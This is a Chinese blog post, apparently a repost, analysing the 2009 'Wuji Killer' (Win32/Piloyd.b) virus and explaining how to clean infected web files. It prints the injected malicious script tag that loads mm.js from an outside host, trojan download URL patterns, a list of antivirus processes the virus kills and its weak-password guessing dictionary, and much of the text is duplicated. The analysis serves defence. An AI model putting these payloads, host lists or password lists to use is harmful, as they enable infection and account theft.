2009年11月16日,安全机构监测到,一个名为“无极杀手”变种b(Win32/Piloyd.b)的病毒正在互联网上疯狂传播,该病毒在短短20天的时间内就感染了37万余台计算机。该病毒被界内成为:“无极杀手”。让人闻风丧胆,实在是厉害。
专家分析,病毒运行后,生成qmgr.dll病毒文件,加载sfc_os.dll并查找其5号导出函数,使得系统的文件保护对于其要修改的qmgr.dll失效,然后病毒从资源中读取数据写到qmgr.dll,修改该文件时间,并启动对应的服务。然后在系统目录下把自身复制为lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身。
病检查当前模块所在进程是否为360tray.exe,如果是则创建一个名为"360SpShadow0"的设备,通过发送IO控制码的方式控制绕过360tray.exe的检测,完成后,退出程序。
查找当前系统中是否存在进程"360tray.exe",如果有,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间,从而第一步的内容得到执行,完成后,删除%SystemRoot%\system32\1l1.dll,同时清空hosts文件。
完成以上动作后,病毒会创建多个线程执行不同操作:
线程1:
将qmgr.dll对应的BITS服务启动类型设置为自动。
删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式
然后在临时文件夹内创建一个名为LiTdi.sys的驱动,创建名为LiTdi服务,并启动服务。查找相关杀毒软件或安全软件进程,并向驱动发送IO控制码的方式结束相关进程。
病毒还会调用IE访问hxxp://nbtj.114anhui.com/msn/163.htm做感染统计。
从表项中依次选择下载十几种恶意程序,其中多数为盗号***。
病毒还会感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件,对于扩展名为.rar的文件,病毒还会解包感染以上扩展名文件后再压缩回去。对于htm,html,asp,aspx的网页文件,
病毒会在其尾部加上“<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script>”的恶意代码,
专家分析,病毒运行后,生成qmgr.dll病毒文件,加载sfc_os.dll并查找其5号导出函数,使得系统的文件保护对于其要修改的qmgr.dll失效,然后病毒从资源中读取数据写到qmgr.dll,修改该文件时间,并启动对应的服务。然后在系统目录下把自身复制为lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身。
病检查当前模块所在进程是否为360tray.exe,如果是则创建一个名为"360SpShadow0"的设备,通过发送IO控制码的方式控制绕过360tray.exe的检测,完成后,退出程序。
查找当前系统中是否存在进程"360tray.exe",如果有,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间,从而第一步的内容得到执行,完成后,删除%SystemRoot%\system32\1l1.dll,同时清空hosts文件。
完成以上动作后,病毒会创建多个线程执行不同操作:
线程1:
将qmgr.dll对应的BITS服务启动类型设置为自动。
删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式
然后在临时文件夹内创建一个名为LiTdi.sys的驱动,创建名为LiTdi服务,并启动服务。查找相关杀毒软件或安全软件进程,并向驱动发送IO控制码的方式结束相关进程。
病毒还会调用IE访问hxxp://nbtj.114anhui.com/msn/163.htm做感染统计。
从表项中依次选择下载十几种恶意程序,其中多数为盗号***。
病毒还会感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件,对于扩展名为.rar的文件,病毒还会解包感染以上扩展名文件后再压缩回去。对于htm,html,asp,aspx的网页文件,
病毒会在其尾部加上“<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script>”的恶意代码,
如图:
使得这些网页文件成为病毒的二次传播源,用户一旦点击这些被感染文件或者网站网页,则会被病毒感染。如图:
病毒还会通过自动播放功能传播。查找可移动存储设备并在其根目录下生成autorun.inf,建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹,把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。
通过自带的弱密钥列表对网上邻居进行猜解,被猜解成功的管理员账户密码的计算机将受到感染;如果连接成功,则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe,同时创建计划任务以激活该病毒。
病毒还会通过自动播放功能传播。查找可移动存储设备并在其根目录下生成autorun.inf,建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹,把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。
通过自带的弱密钥列表对网上邻居进行猜解,被猜解成功的管理员账户密码的计算机将受到感染;如果连接成功,则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe,同时创建计划任务以激活该病毒。
针对该病毒,各杀毒用户只需及时升级杀毒软件到最新病毒库,开启主动防御和实时监控,即可有效防御病毒,免遭“无极杀手”病毒侵害,确保电脑数据安全。
然而遗憾的是,360和其他知名杀毒软件能够将带有<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script>”的文件视为病毒,但这些杀毒软件只能将其感染的源文件删除以绝后患。这就造成我们很多宝贵的文件感染后而束手无策。
然而遗憾的是,360和其他知名杀毒软件能够将带有<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script>”的文件视为病毒,但这些杀毒软件只能将其感染的源文件删除以绝后患。这就造成我们很多宝贵的文件感染后而束手无策。
我服务器上有网站项目100多个,每一个对我来说都很重要,那如果用杀毒软件查杀了,那我岂不死了??
遇到<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script> 这样的,可以先用360杀毒软件扫下,把带有hxxp://mm.aa88567.cn/index/mm.js恶意脚本的网页全部扫出来,然后将这些文件全部放到Dreamweaver里做成站点打开,如果所有项目都在D盘分区内,也可直接将D盘作为站点跟文件夹。使用“查找与替换”功能将其“<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>”替换成空即可。
本人还遇到过“<scr<scr<scr<scr<scr<scr<scr<scr<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script> ”,真是让人哭笑不得。。。
以下是常用到的替换脚本内容:
<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<scr<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>
</html><scr<scr<scr<scr<scr<scr<scr<scr
</html>
<scr<scr<scr<scr<scr<scr<scr<scr
<scr<scr<scr<scr<scr<scr<scr<scr
<scr<scr<scr<scr<scr<scr<scr<scr<scr<script langua" +
"ge=javascript src=http://mm.aa88567.cn/index/mm.js></script>
"ge=javascript src=http://mm.aa88567.cn/index/mm.js></script>
<scr<script language=javascri" +
"pt src=http://mm.aa88567.cn/index/mm.js></script>
<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>
附带病毒报告如下:
UPX加壳
VC++ 6.0 编写
主程序:
病毒加载sfc_os.dll并查找其5号导出函数,使得系统的文件保护对于其要修改的qmgr.dll失效,然后病毒从资源中读取数据写到qmgr.dll,修改该文件时间,并启动对应的服务。
然后把自身复制为%SystemRoot%\system32\dllcache\lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身
释放的DLL除了命名为qmgr.dll,还可能依系统当前服务状况,命名为DLLppmgmts.dll、schedsvc.dll、regsvc.dll、pchsvc.dll、cryptsvc.dll、browser.dll、tapisrv.dll、mswsock.dll、netman.dll、ssdpsrv.dll、upnphost.dll、ntmssvc.dll、es.dll、xmlprov.dll、mspmsnsv.dll、shsvcs.dll之一,并启动相应服务以激活。
释放的qmgr.dll分析:
(1)检查当前模块所在进程是否为360tray.exe,如果是则创建一个名为"360SpShadow0"的设备,通过发送IO控制码的方式控制绕过360tray.exe的检测,完成后,退出程序。
(2)查找当前系统中是否存在进程"360tray.exe",如果有,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间,从而第一步的内容得到执行,完成后,删除%SystemRoot%\system32\1l1.dll。
(3)清空hosts文件
(4)创建多个线程执行不同操作:
线程1:
将qmgr.dll对应的BITS服务启动类型设置为自动。
删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式
然后在临时文件夹内创建一个名为LiTdi.sys的驱动,创建名为LiTdi服务,并启动服务。
查找如下进程,并向驱动发送IO控制码的方式结束下列进程:
KVMonXP.kxp
KVSrvXP.exe
avp.exe
RavMonD.exe
RavTask.exe
RsAgent.exe
rsnetsvr.exe
RsTray.exe
ScanFrm.exe
CCenter.exe
kavstart.exe
kissvc.exe
kpfw32.exe
kpfwsvc.exe
kswebshield.exe
kwatch.exe
kmailmon.exe
egui.exe
ekrn.exe
ccSvcHst.exe
Mcagent.exe
mcmscsvc.exe
McNASvc.exe
Mcods.exe
McProxy.exe
Mcshield.exe
mcsysmon.exe
mcvsshld.exe
MpfSrv.exe
McSACore.exe
msksrver.exe
sched.exe
avguard.exe
avmailc.exe
avwebgrd.exe
avgnt.exe
sched.exe
avguard.exe
avcenter.exe
UfSeAgnt.exe
TMBMSRV.exe
SfCtlCom.exe
TmProxy.exe
360SoftMgrSvc.exe
360tray.exe
qutmserv.exe
bdagent.exe
livesrv.exe
seccenter.exe
vsserv.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
MPMon.exe
ast.exe
360speedld.exe
360SoftMgrSvc.exe
360tray.exe
修复工具.exe
360hotfix.exe
360rpt.exe
360safe.exe
360safebox.exe
krnl360svc.exe
并直接向驱动发送IO控制码的方式建立上述进程的
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options项。
线程2
线程3:
调用IE访问[url]http://nbtj.114anhui.com/msn/163.htm[/url]做感染统计
------------------------------------
<script type="text/javascript" src="http://js.tongji.linezing.com/1230256/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1230256/tongji.gif"/></a></noscript>
----------------------------------
线程4:
下载恶意程序
http://<*>/nbok01/<**>.exe
<*>依次从下表选择:
bbnn7.114central.com
bbnn7a.114central.com
bbnn7ba.114central.com
bbnn7bc.114central.com
bbnn7bd.114central.com
bbnn7jc.114central.com
bbnn7jey.114central.com
bbnn7jy.114central.com
bbnn7jyhr.114central.com
bbnn7jyr.114central.com
<**>依次从下表选择:
dnfTT
tlTT
RXCQTT
mhxuTT
qq3gTT
mxsTT
wmgjTT
zxTT
wdTT
dh2TT
qqhxTT
muTT
ztTT
cqsjTT
djTT
wlTT
jxsjTT
xcTT
tx2TT
zuTT
dh3TT
hx2TT
dhwdTT
zzhTT
CJSHTT
sxTT
yxdTT
MXDTT
jzTT
kxTT
jrTT
cqwdTT
smTT
qqtt
线程5:
感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件
对于扩展名为.rar的文件,解包感染以上扩展名文件后再压缩回去。
对于htm,html,asp,aspx的文件,病毒会在其尾部加上“<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>”。
线程6:
自动播放功能传播。
查找可移动存储设备并在其根目录下生成autorun.inf,建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹,把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。
线程7:
通过自带的弱密钥列表对网上邻居进行猜解,被猜解成功的管理员账户密码的计算机将受到感染;
用户名:Administrator,Guest,admin,Root
密钥列表:
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
pass
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
sex
god
xxxyou
xxx
abc
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
如果连接成功,则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe
同时创建计划任务以激活该病毒。
VC++ 6.0 编写
主程序:
病毒加载sfc_os.dll并查找其5号导出函数,使得系统的文件保护对于其要修改的qmgr.dll失效,然后病毒从资源中读取数据写到qmgr.dll,修改该文件时间,并启动对应的服务。
然后把自身复制为%SystemRoot%\system32\dllcache\lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身
释放的DLL除了命名为qmgr.dll,还可能依系统当前服务状况,命名为DLLppmgmts.dll、schedsvc.dll、regsvc.dll、pchsvc.dll、cryptsvc.dll、browser.dll、tapisrv.dll、mswsock.dll、netman.dll、ssdpsrv.dll、upnphost.dll、ntmssvc.dll、es.dll、xmlprov.dll、mspmsnsv.dll、shsvcs.dll之一,并启动相应服务以激活。
释放的qmgr.dll分析:
(1)检查当前模块所在进程是否为360tray.exe,如果是则创建一个名为"360SpShadow0"的设备,通过发送IO控制码的方式控制绕过360tray.exe的检测,完成后,退出程序。
(2)查找当前系统中是否存在进程"360tray.exe",如果有,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间,从而第一步的内容得到执行,完成后,删除%SystemRoot%\system32\1l1.dll。
(3)清空hosts文件
(4)创建多个线程执行不同操作:
线程1:
将qmgr.dll对应的BITS服务启动类型设置为自动。
删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式
然后在临时文件夹内创建一个名为LiTdi.sys的驱动,创建名为LiTdi服务,并启动服务。
查找如下进程,并向驱动发送IO控制码的方式结束下列进程:
KVMonXP.kxp
KVSrvXP.exe
avp.exe
RavMonD.exe
RavTask.exe
RsAgent.exe
rsnetsvr.exe
RsTray.exe
ScanFrm.exe
CCenter.exe
kavstart.exe
kissvc.exe
kpfw32.exe
kpfwsvc.exe
kswebshield.exe
kwatch.exe
kmailmon.exe
egui.exe
ekrn.exe
ccSvcHst.exe
Mcagent.exe
mcmscsvc.exe
McNASvc.exe
Mcods.exe
McProxy.exe
Mcshield.exe
mcsysmon.exe
mcvsshld.exe
MpfSrv.exe
McSACore.exe
msksrver.exe
sched.exe
avguard.exe
avmailc.exe
avwebgrd.exe
avgnt.exe
sched.exe
avguard.exe
avcenter.exe
UfSeAgnt.exe
TMBMSRV.exe
SfCtlCom.exe
TmProxy.exe
360SoftMgrSvc.exe
360tray.exe
qutmserv.exe
bdagent.exe
livesrv.exe
seccenter.exe
vsserv.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
MPMon.exe
ast.exe
360speedld.exe
360SoftMgrSvc.exe
360tray.exe
修复工具.exe
360hotfix.exe
360rpt.exe
360safe.exe
360safebox.exe
krnl360svc.exe
并直接向驱动发送IO控制码的方式建立上述进程的
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options项。
线程2
线程3:
调用IE访问[url]http://nbtj.114anhui.com/msn/163.htm[/url]做感染统计
------------------------------------
<script type="text/javascript" src="http://js.tongji.linezing.com/1230256/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1230256/tongji.gif"/></a></noscript>
----------------------------------
线程4:
下载恶意程序
http://<*>/nbok01/<**>.exe
<*>依次从下表选择:
bbnn7.114central.com
bbnn7a.114central.com
bbnn7ba.114central.com
bbnn7bc.114central.com
bbnn7bd.114central.com
bbnn7jc.114central.com
bbnn7jey.114central.com
bbnn7jy.114central.com
bbnn7jyhr.114central.com
bbnn7jyr.114central.com
<**>依次从下表选择:
dnfTT
tlTT
RXCQTT
mhxuTT
qq3gTT
mxsTT
wmgjTT
zxTT
wdTT
dh2TT
qqhxTT
muTT
ztTT
cqsjTT
djTT
wlTT
jxsjTT
xcTT
tx2TT
zuTT
dh3TT
hx2TT
dhwdTT
zzhTT
CJSHTT
sxTT
yxdTT
MXDTT
jzTT
kxTT
jrTT
cqwdTT
smTT
qqtt
线程5:
感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件
对于扩展名为.rar的文件,解包感染以上扩展名文件后再压缩回去。
对于htm,html,asp,aspx的文件,病毒会在其尾部加上“<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>”。
线程6:
自动播放功能传播。
查找可移动存储设备并在其根目录下生成autorun.inf,建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹,把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。
线程7:
通过自带的弱密钥列表对网上邻居进行猜解,被猜解成功的管理员账户密码的计算机将受到感染;
用户名:Administrator,Guest,admin,Root
密钥列表:
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
pass
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
sex
god
xxxyou
xxx
abc
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
如果连接成功,则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe
同时创建计划任务以激活该病毒。
转载于:https://blog.51cto.com/bjiokn/334317
8230
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
